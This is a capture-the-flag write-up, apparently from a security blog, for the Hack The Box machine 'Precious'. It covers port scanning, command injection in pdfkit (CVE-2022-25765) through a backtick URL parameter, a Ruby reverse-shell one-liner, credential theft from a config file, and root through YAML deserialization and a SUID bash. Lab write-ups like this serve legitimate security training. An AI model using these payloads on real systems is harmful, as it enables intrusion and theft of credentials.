Thursday, February 16, 2023

HTB - Precious

Enumeration

First things first, let's run some basic enumeration to see what is running. 
 
 nmap -sC -sV -Pn -T 4 <target IP>
 ---------------
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-15 14:35 GMT
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.99 seconds
 ---------------
 
We have ssh and http open, there looks to be a redirect on port 80 to http://precious.htb , let's edit our host file and add it in.  
 
 echo '10.10.11.189    precious.htb' | sudo tee -a /etc/hosts

If we now go to previous.htb we're greeted with a webpage for converting web pages to PDFs. 
 
Testing to see what is accepted:
test.com - no
/test/test - no

http://test.com - yes
 


We can fire up a http server to see how the site works:
python3 -m http.server 8000

Let's just throw in http://<my-IP>:8000/

We get a nice PDF of the file directory. Download and let's see what process is being used to create the PDF.

Open with Atril Document Viewer as that is what we have to hand and then check the properties of the PDF.
 
 

Awesome, we now know the process involves pdfkit v0.8.6 and we can go to our favourite search engine and see if there are any known exploits!

Bingo! We've got some Command Injection | CVE-2022-25765
 

Exploitation

Reading and veiwing various sources for this exploit we can begin to understand how to use the PoC. 

Using the PoC from sercurity.snyk.io we can send a request with the name parameter and then using the backtick with our command.

http://<our-IP>:8000/?name=%20`whoami`
 
 

Let's use the reverse shell from CyberArchitect

http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20`](http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20%60) ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))')` 
 
Before running, set up your listener. 
 

We have a shell!
 
Switching to our home folder we see the .bundle folder, within here is a config file. cat that file and we get a password to the account henry

We can now use these newly obtained credentials to SSH into the box.
 

Privilege Escalation

Henry has permissions to run update_dependencies.rb as root. If we take a look at the file we find it is using YAML.load which is vulnerable to a deserialization attack. 
 
 
A payload can be found here 
With a blog post running through it here

We know from investigating update_dependencies.rb that loads the file dependencies.yml .

Create the file dependencies.yml and add the payload.

We're a step closer to root. We can edit the command now to try and get a shell. We're going to set the SUID bit on bash to allow henry to run bash as root.

The final payload looks like this:

 We run it, we're root, we switch to the home directory and we claim the flag!

 

THM - Windows Forensics 1

Scenario One of the Desktops in the research lab at Organization X is  suspected to have been accessed by someone unauthorized. Although the...